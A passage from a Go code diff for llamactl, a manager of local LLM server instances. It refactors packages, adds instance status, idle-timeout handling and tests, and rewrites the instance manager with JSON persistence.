log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, *c.IdleTimeout)
*c.IdleTimeout = 0
}
// Apply defaults from global settings for nil fields
if globalSettings != nil {
if c.AutoRestart == nil {
c.AutoRestart = &globalSettings.DefaultAutoRestart
}
if c.MaxRestarts == nil {
c.MaxRestarts = &globalSettings.DefaultMaxRestarts
}
if c.RestartDelay == nil {
c.RestartDelay = &globalSettings.DefaultRestartDelay
}
if c.OnDemandStart == nil {
c.OnDemandStart = &globalSettings.DefaultOnDemandStart
}
if c.IdleTimeout == nil {
defaultIdleTimeout := 0
c.IdleTimeout = &defaultIdleTimeout
}
}
}
func (c *CreateInstanceOptions) GetCommand(backendConfig *config.BackendSettings) string {
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
return "docker"
}
return backendConfig.Command
}
// BuildCommandArgs builds command line arguments for the backend
func (c *CreateInstanceOptions) BuildCommandArgs(backendConfig *config.BackendSettings) []string {
var args []string
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
// For Docker, start with Docker args
args = append(args, backendConfig.Docker.Args...)
args = append(args, backendConfig.Docker.Image)
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
args = append(args, c.LlamaServerOptions.BuildDockerArgs()...)
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
args = append(args, c.VllmServerOptions.BuildDockerArgs()...)
}
}
} else {
// For native execution, start with backend args
args = append(args, backendConfig.Args...)
switch c.BackendType {
case backends.BackendTypeLlamaCpp:
if c.LlamaServerOptions != nil {
args = append(args, c.LlamaServerOptions.BuildCommandArgs()...)
}
case backends.BackendTypeMlxLm:
if c.MlxServerOptions != nil {
args = append(args, c.MlxServerOptions.BuildCommandArgs()...)
}
case backends.BackendTypeVllm:
if c.VllmServerOptions != nil {
args = append(args, c.VllmServerOptions.BuildCommandArgs()...)
}
}
}
return args
}
func (c *CreateInstanceOptions) BuildEnvironment(backendConfig *config.BackendSettings) map[string]string {
env := map[string]string{}
if backendConfig.Environment != nil {
maps.Copy(env, backendConfig.Environment)
}
if backendConfig.Docker != nil && backendConfig.Docker.Enabled && c.BackendType != backends.BackendTypeMlxLm {
if backendConfig.Docker.Environment != nil {
maps.Copy(env, backendConfig.Docker.Environment)
}
}
if c.Environment != nil {
maps.Copy(env, c.Environment)
}
return env
}

View File

@@ -1,6 +1,6 @@
//go:build !windows
package llamactl
package instance
import (
"os/exec"

View File

@@ -1,6 +1,6 @@
//go:build windows
package llamactl
package instance
import "os/exec"

70
pkg/instance/status.go Normal file
View File

@@ -0,0 +1,70 @@
package instance
import (
"encoding/json"
"log"
)
// Enum for instance status
type InstanceStatus int
const (
Stopped InstanceStatus = iota
Running
Failed
)
var nameToStatus = map[string]InstanceStatus{
"stopped": Stopped,
"running": Running,
"failed": Failed,
}
var statusToName = map[InstanceStatus]string{
Stopped: "stopped",
Running: "running",
Failed: "failed",
}
func (p *Process) SetStatus(status InstanceStatus) {
oldStatus := p.Status
p.Status = status
if p.onStatusChange != nil {
p.onStatusChange(oldStatus, status)
}
}
func (p *Process) GetStatus() InstanceStatus {
return p.Status
}
// IsRunning returns true if the status is Running
func (p *Process) IsRunning() bool {
return p.Status == Running
}
func (s InstanceStatus) MarshalJSON() ([]byte, error) {
name, ok := statusToName[s]
if !ok {
name = "stopped" // Default to "stopped" for unknown status
}
return json.Marshal(name)
}
// UnmarshalJSON implements json.Unmarshaler
func (s *InstanceStatus) UnmarshalJSON(data []byte) error {
var str string
if err := json.Unmarshal(data, &str); err != nil {
return err
}
status, ok := nameToStatus[str]
if !ok {
log.Printf("Unknown instance status: %s", str)
status = Stopped // Default to Stopped on unknown status
}
*s = status
return nil
}

28
pkg/instance/timeout.go Normal file
View File

@@ -0,0 +1,28 @@
package instance
// UpdateLastRequestTime updates the last request access time for the instance via proxy
func (i *Process) UpdateLastRequestTime() {
i.mu.Lock()
defer i.mu.Unlock()
lastRequestTime := i.timeProvider.Now().Unix()
i.lastRequestTime.Store(lastRequestTime)
}
func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.IsRunning() || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}
// Check if the last request time exceeds the idle timeout
lastRequest := i.lastRequestTime.Load()
idleTimeoutMinutes := *i.options.IdleTimeout
// Convert timeout from minutes to seconds for comparison
idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
return (i.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
}

View File

@@ -0,0 +1,274 @@
package instance_test
import (
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"sync/atomic"
"testing"
"time"
)
// MockTimeProvider implements TimeProvider for testing
type MockTimeProvider struct {
currentTime atomic.Int64 // Unix timestamp
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
m := &MockTimeProvider{}
m.currentTime.Store(t.Unix())
return m
}
func (m *MockTimeProvider) Now() time.Time {
return time.Unix(m.currentTime.Load(), 0)
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.currentTime.Store(t.Unix())
}
// Timeout-related tests
func TestUpdateLastRequestTime(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Test that UpdateLastRequestTime doesn't panic
inst.UpdateLastRequestTime()
}
func TestShouldTimeout_NotRunning(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Instance is not running, should not timeout regardless of configuration
if inst.ShouldTimeout() {
t.Error("Non-running instance should never timeout")
}
}
func TestShouldTimeout_NoTimeoutConfigured(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
idleTimeout *int
}{
{"nil timeout", nil},
{"zero timeout", testutil.IntPtr(0)},
{"negative timeout", testutil.IntPtr(-5)},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
// Simulate running state
inst.SetStatus(instance.Running)
if inst.ShouldTimeout() {
t.Errorf("Instance with %s should not timeout", tt.name)
}
})
}
}
func TestShouldTimeout_WithinTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 5 // 5 minutes
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Update last request time to now
inst.UpdateLastRequestTime()
// Should not timeout immediately
if inst.ShouldTimeout() {
t.Error("Instance should not timeout when last request was recent")
}
}
func TestShouldTimeout_ExceedsTimeLimit(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
idleTimeout := 1 // 1 minute
options := &instance.CreateInstanceOptions{
IdleTimeout: &idleTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
inst.SetStatus(instance.Running)
// Use MockTimeProvider to simulate old last request time
mockTime := NewMockTimeProvider(time.Now())
inst.SetTimeProvider(mockTime)
// Set last request time to now
inst.UpdateLastRequestTime()
// Advance time by 2 minutes (exceeds 1 minute timeout)
mockTime.SetTime(time.Now().Add(2 * time.Minute))
if !inst.ShouldTimeout() {
t.Error("Instance should timeout when last request exceeds idle timeout")
}
}
func TestTimeoutConfiguration_Validation(t *testing.T) {
backendConfig := &config.BackendConfig{
LlamaCpp: config.BackendSettings{
Command: "llama-server",
},
MLX: config.BackendSettings{
Command: "mlx_lm.server",
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
tests := []struct {
name string
inputTimeout *int
expectedTimeout int
}{
{"default value when nil", nil, 0},
{"positive value", testutil.IntPtr(10), 10},
{"zero value", testutil.IntPtr(0), 0},
{"negative value gets corrected", testutil.IntPtr(-5), 0},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
IdleTimeout: tt.inputTimeout,
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", backendConfig, globalSettings, options, mockOnStatusChange)
opts := inst.GetOptions()
if opts.IdleTimeout == nil || *opts.IdleTimeout != tt.expectedTimeout {
t.Errorf("Expected IdleTimeout %d, got %v", tt.expectedTimeout, opts.IdleTimeout)
}
})
}
}

View File

@@ -1,442 +0,0 @@
package llamactl_test
import (
"encoding/json"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstance(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &llamactl.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Test with invalid negative values
invalidMaxRestarts := -5
invalidRestartDelay := -10
options := &llamactl.CreateInstanceOptions{
MaxRestarts: &invalidMaxRestarts,
RestartDelay: &invalidRestartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that negative values were corrected to 0
if opts.MaxRestarts == nil || *opts.MaxRestarts != 0 {
t.Errorf("Expected MaxRestarts to be corrected to 0, got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 0 {
t.Errorf("Expected RestartDelay to be corrected to 0, got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions)
// Update options
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
instance.SetOptions(newOptions)
opts := instance.GetOptions()
if opts.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
}
if opts.Port != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port)
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestSetOptions_NilOptions(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
originalOptions := instance.GetOptions()
// Try to set nil options
instance.SetOptions(nil)
// Options should remain unchanged
currentOptions := instance.GetOptions()
if currentOptions.Model != originalOptions.Model {
t.Error("Options should not change when setting nil options")
}
}
func TestGetProxy(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
// Get proxy for the first time
proxy1, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := instance.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := llamactl.NewInstance("test-instance", globalSettings, options)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]interface{}
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["running"] != false {
t.Errorf("Expected running false, got %v", result["running"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": true,
"options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false,
"max_restarts": 5
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if !instance.Running {
t.Error("Expected running to be true")
}
opts := instance.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestUnmarshalJSON_PartialOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false,
"options": {
"model": "/path/to/model.gguf"
}
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
// Note: Defaults are NOT applied during unmarshaling
// They should only be applied by NewInstance or SetOptions
if opts.AutoRestart != nil {
t.Error("Expected AutoRestart to be nil (no defaults applied during unmarshal)")
}
}
func TestUnmarshalJSON_NoOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false
}`
var instance llamactl.Instance
err := json.Unmarshal([]byte(jsonData), &instance)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("Expected running to be false")
}
opts := instance.GetOptions()
if opts != nil {
t.Error("Expected options to be nil when not provided in JSON")
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "nil values",
maxRestarts: nil,
restartDelay: nil,
expectedMax: 0, // Should remain nil, but we can't easily test nil in this structure
expectedDelay: 0,
},
{
name: "valid positive values",
maxRestarts: intPtr(10),
restartDelay: intPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: intPtr(0),
restartDelay: intPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: intPtr(-5),
restartDelay: intPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
globalSettings := &llamactl.InstancesConfig{
LogDirectory: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &llamactl.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := llamactl.NewInstance("test", globalSettings, options)
opts := instance.GetOptions()
if tt.maxRestarts != nil {
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
}
if tt.restartDelay != nil {
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
}
})
}
}

View File

@@ -1,249 +0,0 @@
package llamactl
import (
"fmt"
"sync"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*Instance, error)
CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
GetInstance(name string) (*Instance, error)
UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error)
DeleteInstance(name string) error
StartInstance(name string) (*Instance, error)
StopInstance(name string) (*Instance, error)
RestartInstance(name string) (*Instance, error)
GetInstanceLogs(name string) (string, error)
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*Instance
ports map[int]bool
instancesConfig InstancesConfig
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(instancesConfig InstancesConfig) InstanceManager {
return &instanceManager{
instances: make(map[string]*Instance),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
}
}
// ListInstances returns a list of all instances managed by the instance manager.
func (im *instanceManager) ListInstances() ([]*Instance, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instances := make([]*Instance, 0, len(im.instances))
for _, instance := range im.instances {
instances = append(instances, instance)
}
return instances, nil
}
// CreateInstance creates a new instance with the given options and returns it.
// The instance is initially in a "stopped" state.
func (im *instanceManager) CreateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
if len(im.instances) >= im.instancesConfig.MaxInstances && im.instancesConfig.MaxInstances != -1 {
return nil, fmt.Errorf("maximum number of instances (%d) reached", im.instancesConfig.MaxInstances)
}
err := ValidateInstanceName(name)
if err != nil {
return nil, err
}
err = ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
im.mu.Lock()
defer im.mu.Unlock()
// Check if instance with this name already exists
if im.instances[name] != nil {
return nil, fmt.Errorf("instance with name %s already exists", name)
}
// Assign a port if not specified
if options.Port == 0 {
port, err := im.getNextAvailablePort()
if err != nil {
return nil, fmt.Errorf("failed to get next available port: %w", err)
}
options.Port = port
} else {
// Validate the specified port
if _, exists := im.ports[options.Port]; exists {
return nil, fmt.Errorf("port %d is already in use", options.Port)
}
im.ports[options.Port] = true
}
instance := NewInstance(name, &im.instancesConfig, options)
im.instances[instance.Name] = instance
im.ports[options.Port] = true
return instance, nil
}
// GetInstance retrieves an instance by its name.
func (im *instanceManager) GetInstance(name string) (*Instance, error) {
im.mu.RLock()
defer im.mu.RUnlock()
instance, exists := im.instances[name]
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
return instance, nil
}
// UpdateInstance updates the options of an existing instance and returns it.
// If the instance is running, it will be restarted to apply the new options.
func (im *instanceManager) UpdateInstance(name string, options *CreateInstanceOptions) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if options == nil {
return nil, fmt.Errorf("instance options cannot be nil")
}
err := ValidateInstanceOptions(options)
if err != nil {
return nil, err
}
// Check if instance is running before updating options
wasRunning := instance.Running
// If the instance is running, stop it first
if wasRunning {
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s for update: %w", name, err)
}
}
// Now update the options while the instance is stopped
instance.SetOptions(options)
// If it was running before, start it again with the new options
if wasRunning {
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s after update: %w", name, err)
}
}
return instance, nil
}
// DeleteInstance removes stopped instance by its name.
func (im *instanceManager) DeleteInstance(name string) error {
im.mu.Lock()
defer im.mu.Unlock()
_, exists := im.instances[name]
if !exists {
return fmt.Errorf("instance with name %s not found", name)
}
if im.instances[name].Running {
return fmt.Errorf("instance with name %s is still running, stop it before deleting", name)
}
delete(im.ports, im.instances[name].options.Port)
delete(im.instances, name)
return nil
}
// StartInstance starts a stopped instance and returns it.
// If the instance is already running, it returns an error.
func (im *instanceManager) StartInstance(name string) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if instance.Running {
return instance, fmt.Errorf("instance with name %s is already running", name)
}
if err := instance.Start(); err != nil {
return nil, fmt.Errorf("failed to start instance %s: %w", name, err)
}
return instance, nil
}
// StopInstance stops a running instance and returns it.
func (im *instanceManager) StopInstance(name string) (*Instance, error) {
im.mu.RLock()
instance, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return nil, fmt.Errorf("instance with name %s not found", name)
}
if !instance.Running {
return instance, fmt.Errorf("instance with name %s is already stopped", name)
}
if err := instance.Stop(); err != nil {
return nil, fmt.Errorf("failed to stop instance %s: %w", name, err)
}
return instance, nil
}
// RestartInstance stops and then starts an instance, returning the updated instance.
func (im *instanceManager) RestartInstance(name string) (*Instance, error) {
instance, err := im.StopInstance(name)
if err != nil {
return nil, err
}
return im.StartInstance(instance.Name)
}
// GetInstanceLogs retrieves the logs for a specific instance by its name.
func (im *instanceManager) GetInstanceLogs(name string) (string, error) {
im.mu.RLock()
_, exists := im.instances[name]
im.mu.RUnlock()
if !exists {
return "", fmt.Errorf("instance with name %s not found", name)
}
// TODO: Implement actual log retrieval logic
return fmt.Sprintf("Logs for instance %s", name), nil
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}

298
pkg/manager/manager.go Normal file
View File

@@ -0,0 +1,298 @@
package manager
import (
"encoding/json"
"fmt"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"log"
"os"
"path/filepath"
"strings"
"sync"
"time"
)
// InstanceManager defines the interface for managing instances of the llama server.
type InstanceManager interface {
ListInstances() ([]*instance.Process, error)
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
GetInstance(name string) (*instance.Process, error)
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
DeleteInstance(name string) error
StartInstance(name string) (*instance.Process, error)
IsMaxRunningInstancesReached() bool
StopInstance(name string) (*instance.Process, error)
EvictLRUInstance() error
RestartInstance(name string) (*instance.Process, error)
GetInstanceLogs(name string) (string, error)
Shutdown()
}
type instanceManager struct {
mu sync.RWMutex
instances map[string]*instance.Process
runningInstances map[string]struct{}
ports map[int]bool
instancesConfig config.InstancesConfig
backendsConfig config.BackendConfig
// Timeout checker
timeoutChecker *time.Ticker
shutdownChan chan struct{}
shutdownDone chan struct{}
isShutdown bool
}
// NewInstanceManager creates a new instance of InstanceManager.
func NewInstanceManager(backendsConfig config.BackendConfig, instancesConfig config.InstancesConfig) InstanceManager {
if instancesConfig.TimeoutCheckInterval <= 0 {
instancesConfig.TimeoutCheckInterval = 5 // Default to 5 minutes if not set
}
im := &instanceManager{
instances: make(map[string]*instance.Process),
runningInstances: make(map[string]struct{}),
ports: make(map[int]bool),
instancesConfig: instancesConfig,
backendsConfig: backendsConfig,
timeoutChecker: time.NewTicker(time.Duration(instancesConfig.TimeoutCheckInterval) * time.Minute),
shutdownChan: make(chan struct{}),
shutdownDone: make(chan struct{}),
}
// Load existing instances from disk
if err := im.loadInstances(); err != nil {
log.Printf("Error loading instances: %v", err)
}
// Start the timeout checker goroutine after initialization is complete
go func() {
defer close(im.shutdownDone)
for {
select {
case <-im.timeoutChecker.C:
im.checkAllTimeouts()
case <-im.shutdownChan:
return // Exit goroutine on shutdown
}
}
}()
return im
}
func (im *instanceManager) getNextAvailablePort() (int, error) {
portRange := im.instancesConfig.PortRange
for port := portRange[0]; port <= portRange[1]; port++ {
if !im.ports[port] {
im.ports[port] = true
return port, nil
}
}
return 0, fmt.Errorf("no available ports in the specified range")
}
// persistInstance saves an instance to its JSON file
func (im *instanceManager) persistInstance(instance *instance.Process) error {
if im.instancesConfig.InstancesDir == "" {
return nil // Persistence disabled
}
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
tempPath := instancePath + ".tmp"
// Serialize instance to JSON
jsonData, err := json.MarshalIndent(instance, "", " ")
if err != nil {
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
}
// Write to temporary file first
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
}
// Atomic rename
